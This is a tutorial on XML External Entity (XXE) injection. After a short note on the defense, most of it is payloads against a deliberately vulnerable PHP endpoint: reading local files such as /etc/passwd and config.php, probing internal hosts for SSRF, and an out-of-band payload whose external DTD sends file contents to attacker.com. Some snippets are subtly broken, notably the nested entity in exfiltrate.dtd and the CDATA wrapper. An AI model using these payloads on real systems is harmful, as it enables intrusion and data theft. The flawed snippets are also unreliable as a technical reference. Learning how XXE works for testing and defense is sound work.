Understanding and Exploiting XML External Entity (XXE) Vulnerabilities
XML External Entity (XXE) injection is a specific type of vulnerability that occurs when an XML parser insecurely processes external entity references within an XML document. Unlike standard XML injection, which often results in logic-based issues, XXE significantly expands the attack surface, potentially leading to unauthorized data access, server-side request forgery (SSRF), and denial of service.
The primary defense against this vulnerability is to disable the resolution of external entities. In PHP applications using libxml, this is achieved by setting libxml_disable_entity_loader(true).
Core XML Concepts
Document Type Definition (DTD)
A DTD defines the legal structure of an XML document, specifying the elements and attributes allowed. It also serves as the container where entities are declared.
Entity Types
Entities act as variables within XML. They are categorized into four main types:
-
Internal Entities: Defined within the DTD for use inside the XML body.
<!DOCTYPE root [ <!ENTITY author "TechnicalWriter"> ]> <root>&author;</root> -
External Entities: Defined using the
SYSTEMorPUBLICkeyword to fetch content from a URI or local file.<!DOCTYPE root [ <!ENTITY sysinfo SYSTEM "file:///etc/hostname"> ]> <root>&sysinfo;</root> -
Parameter Entities: Used exclusively with in the DTD. They are declared with a percent sign (
%).<!ENTITY % remote_dtd SYSTEM "http://attacker.com/evil.dtd"> %remote_dtd; -
Public Entities: Similar to external antities but identified by a formal public identifier.
Exploitation Scenarios
To demonstrate these vulnerabilities, consider a PHP backend that processes raw XML input:
<?php
// Enable external entity loading for demonstration purposes
libxml_disable_entity_loader(false);
$raw_xml = file_get_contents('php://input');
$xml_doc = new DOMDocument();
// LIBXML_NOENT is required to substitute entities
$xml_doc->loadXML($raw_xml, LIBXML_NOENT | LIBXML_DTDLOAD);
$parsed_data = simplexml_import_dom($xml_doc);
echo $parsed_data;
?>
1. Arbitrary File Disclosure (In-band)
If the application echoes the parsed XML content back to the user, an attacker can read sensitive files directly.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request [
<!ENTITY sensitive SYSTEM "file:///C:/windows/win.ini">
]>
<request>&sensitive;</request>
2. Handling Special Characters with CDATA
Reading files containing characters like <, >, or & often breaks the XML parser. To bypass this, attackers use a combination of paramter entities and external DTDs to wrap the content in a CDATA block.
Payload:
<!DOCTYPE data [
<!ENTITY % source SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">
<!ENTITY % dtd SYSTEM "http://attacker.com/wrapper.dtd">
%dtd;
]>
<data>&all;</data>
External DTD (wrapper.dtd):
<!ENTITY all "<![CDATA[%source;]]>">
3. Server-Side Request Forgery (SSRF)
XXE can be leveraged to probe the internal network. By targeting internal IP addresses and ports, an attacker can map the infrastructure or identify hidden services.
<!DOCTYPE probe [
<!ENTITY port_scan SYSTEM "http://192.168.1.1:8080">
]>
<root>&port_scan;</root>
Observation of response latency or specific error messages helps determine if a port is open or a host is live.
4. Out-of-Band (Blind) XXE
When the application does not return the XML output, data must be exfiltrated to an external server. This requires a nested parameter entity technique.
Main Payload:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % remote SYSTEM "http://attacker.com/exfiltrate.dtd">
%remote;
%exec;
]>
<root>BlindXXE</root>
External DTD (exfiltrate.dtd):
<!ENTITY % exec "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%send;
In this flow, the server reads the file, encodes it in Base64, and then sends it as a URL parameter to the attacker's web server logs.